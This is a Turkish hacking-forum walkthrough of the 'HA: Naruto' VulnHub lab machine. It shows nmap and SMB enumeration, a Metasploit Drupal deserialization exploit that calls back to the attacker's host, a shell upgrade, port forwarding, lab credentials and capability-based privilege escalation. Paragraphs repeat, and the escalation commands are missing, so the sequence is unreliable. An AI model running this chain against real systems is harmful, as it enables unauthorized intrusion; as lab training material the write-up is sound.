HA: Naturo Zafiyetli Makine Çözümü
Merhabalar değerli Türk Hack Team ailesi, bu konumda sizlere "HA: Naruto Zafiyetli Makine Çözümünü" göstereceğim. Zafiyetli Makine Çözümünü yaptığım kaynağa ulaşmak için tıklayın; Tıklayın.https://www.hackingarticles.in/ha-naruto-vulnhub-walkthrough/
Merhabalar değerli Türk Hack Team ailesi, bu konumda sizlere "HA: Naruto Zafiyetli Makine Çözümünü" göstereceğim. Zafiyetli Makine Çözümünü yaptığım kaynağa ulaşmak için tıklayın; Tıklayın.https://www.hackingarticles.in/ha-naruto-vulnhub-walkthrough/
HA: Naruto
İsim: HA: Naruto
Çıkış Tarihi: 11 Ocak 2019
Yapım: Aarti Singh & Hacking Articles
Dosya Boyutu: 1001/mb
Zorluk: Kolay
Açıklama: Bir Numara Hiperaktif, Knucklehead Ninja
Hedef: final.txt
Seri: HA
Her şeyden önce hedefimizi belirlemeye çalışıyoruz ve bunun için aşağıdaki komutu kullanıyoruz: netdiscover
Şimdi açık portlar ve hedef makinede çalışan servisler hakkında bilgi edinmek için Nmap kullanarak agresif bir port taraması yapacağız.
Kod:
nmap -A 192.168.0.4
Taramanın sonucunda 80,22,139 ve 445 Apache, SSH ve Smb portlarının açık bir halde aktif olduğunu
görüyoruz. Ardından tarayıcımıza 192.168.0.4 yazarak anasayfamıza gidiyoruz.
Smbclient ile içeride bulunan dosyaları taratıyoruz ve ardından karşımıza "uzumaki.txt" metin belgesi çıkıyor.
Kod:
smbclient -L \\192.168.0.4
Aşağıdaki komutu kullanarak bilgisayara "uzumaki.txt" dosyasını aktarıyoruz.
Kod:
smbclient //192.168.0.4/Naruto
Ardından aşağıdaki komutu terminalimize yazarak dosyayı görüntülüyoruz.
Kod:
cat uzumaki.txt
Sonra metin dosyasını açmak için cat komutunu kullandık ve bu kelimenin metin dosyasında çift tırnak içinde
olduğunu gördüğümüz gibi Gara ipucunu aldık.
Daha sonrasında bunu tarayıcı içerisinde açmayı denedik ve hoşgeldin sayfasına erişdik.
Şimdi eski dostumuz Me'tasploit'i daha önce bulduğumuz Drupal Sayfasından yararlanmak için kullanacağız.
Kod:
msf5 > use exploit/unix/webapp/drupal_restws_unserialize
Kod:
msf5 exploit (unix/webapp/ drupal_restws_unserialize) > set rhosts 192.168.0.4
Kod:
msf5 exploit (unix/webapp/ drupal_restws_unserialize) > set targeturi /gara
Kod:
msf5 exploit (unix/webapp/ drupal_restws_unserialize) > set lhost 192.168.0.5
Kod:
msf5 exploit (unix/webapp/ drupal_restws_unserialize) > exploit
Session oturumuna girdikten sonra hedef sistemde bir shell elde etmek için shell komutunu kullandık.
Kod:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Numaralandırma işlemine, bize portlarıyla olan tüm bağlantıları gösteren aşağıdaki komutu kullanarak gideceğiz.
Kod:
netstat -antp
Yerel ağ statikimizi TCP ve UDP bağlantıları için kontrol edersek, 8080 çalıştıran bir şey olduğunu görürüz ve nmap bile bunun için hiçbir şey göstermez. Sayaç yardımıyla, 8080 servis portunu yerel ev sahibimize: 8080 yönlendirdik.
Kod:
portfwd add -l 8080 -p 8080 -r 127.0.0.1
Hizmeti yerel makinemize ilettikten sonra, burada yaptığımız gibi web tarayıcısını keşfedebiliriz.
Bu bize aşağıdaki kimlik bilgilerini sağlayacaktır:
User: yashika
Password: raj@123
Şimdi yapmamız gereken, bu kullanıcıya tüm root izinlerini verecek su komutunu çalıştırmak ve bununla aşağıdaki kimlik bilgilerini kullanarak başarıyla giriş yaptık:
Kullanıcının yetkilerinin ve bu özelliklerin etkin olup olmadığını öğrenmek için aşağıdaki komutu kullanacağız:
Bu bize aşağıdaki kimlik bilgilerini sağlayacaktır:
User: yashika
Password: raj@123
Şimdi yapmamız gereken, bu kullanıcıya tüm root izinlerini verecek su komutunu çalıştırmak ve bununla aşağıdaki kimlik bilgilerini kullanarak başarıyla giriş yaptık:
Kullanıcının yetkilerinin ve bu özelliklerin etkin olup olmadığını öğrenmek için aşağıdaki komutu kullanacağız:
Kod:
getcap -r / 2>/dev/null
Kod:
id
Kod:
cd /root
Kod:
cat final.txt
Sonucunda kahramanımız "Naruto" karşımıza çıktı.
Evet Türk Hack Team ailesi konum bu kadar. Bir sonraki konumda görüşmek üzere. Esenlikler
Son düzenleme: